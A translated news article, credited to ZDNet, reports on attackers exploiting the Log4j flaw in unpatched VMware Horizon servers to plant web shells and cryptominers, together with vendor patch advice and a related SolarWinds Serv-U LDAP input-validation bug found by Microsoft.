According to several cybersecurity firms, attackers are still targeting VMware Horizon servers through Log4j vulnerabilities.
Two weeks ago, the UK’s National Health Service (NHS) issued a warning that an “unknown malicious group” was attempting to exploit a Log4j vulnerability (CVE-2021-44228) in VMware Horizon servers. The attackers’ goal is to establish web shells that could be used to distribute malware and ransomware, steal sensitive information, and carry out other malicious attacks.
VMWare urges customers to apply patches
Since then, several cybersecurity companies have confirmed that cyberattackers continue to target VMware Horizon servers.
In a statement to ZDNet, VMware says it continues to urge customers to apply the latest guidance found in its security advisory, VMSA-2021-0028, to address vulnerabilities CVE-2021-44228 and CVE-2021- 4504.
“We also recommend that customers review our ‘Questions and Answers’ document for the latest information and subscribe to the Security-Announce mailing list for any future notices. Any internet-connected service that has not yet been patched for the Log4j CVE-2021-44228 and CVE-2021-4504 vulnerabilities is vulnerable to cyberattacks, and VMware strongly recommends patching it,” the company says.
25,000 Horizon servers are currently accessible
Rapid7 saw a sudden increase in VMware Horizon exploitation on January 14 and identified five unique paths attackers took after the exploitation. This indicates that several actors are involved in this massive exploitation activity.
“In the most common activity, the attacker runs PowerShell and uses the built-in System.Net.WebClient object to download cryptocurrency mining software onto the system,” Rapid7 explains.
Huntress posted her own blog on the issue, noting that according to Shodan, around 25,000 Horizon servers are currently accessible on the internet worldwide.
A target of choice
Roger Koehler, vice president of operations at Huntress, told ZDNet that the NHS article does not address the extent of the problem.
“Given the number of unpatched Horizon servers in our database (only 18% were patched last Friday evening), there is a high risk of impact to hundreds, if not thousands of businesses. This weekend is also the first time we have seen evidence of widespread escalation, from gaining initial access to launching hostile actions on Horizon servers,” he adds. .
“Given that we are seeing multiple, possibly unrelated campaigns (cryptocurrencies, web shells, Cobalt Strike), it is likely that the escalation will continue. Attackers will make companies pay for not applying all patches. Although the initial web shells campaign appears to be focused on long-term access, future activity is likely to focus on targeting or impacting systems accessed through VMware Horizon. And it makes sense: attackers can use this access to impact all virtualized hosts and servers. »
Side effects
Microsoft researchers also discovered a previously undisclosed vulnerability in SolarWinds Serv-U software while monitoring campaigns related to Log4J vulnerabilities.
Jonathan Bar Gold recount on Twitter that while researching an attempt to exploit Log4J, he noticed attacks from serv-u.exe. “Solarwinds immediately responded, investigated and fixed the vulnerability. Their response is the fastest I have seen, truly amazing work from them! “, he points out.
Microsoft then published a blog post about the issue, identified as CVE-2021-35247. The editor explains that this is an “input validation vulnerability that could allow attackers to construct a request from a certain input and send this request over the network without sanitizing”.
In its advisory, SolarWinds clarifies that the Serv-U web login screen for LDAP authentication allowed characters that were not validated. “SolarWinds has updated the input mechanism to perform additional validation and sanitization. No downstream effects were detected, as LDAP servers ignored incorrect characters,” the company reassures, adding that the bug affects version 15.2.5 and earlier versions.
Source: ZDNet.com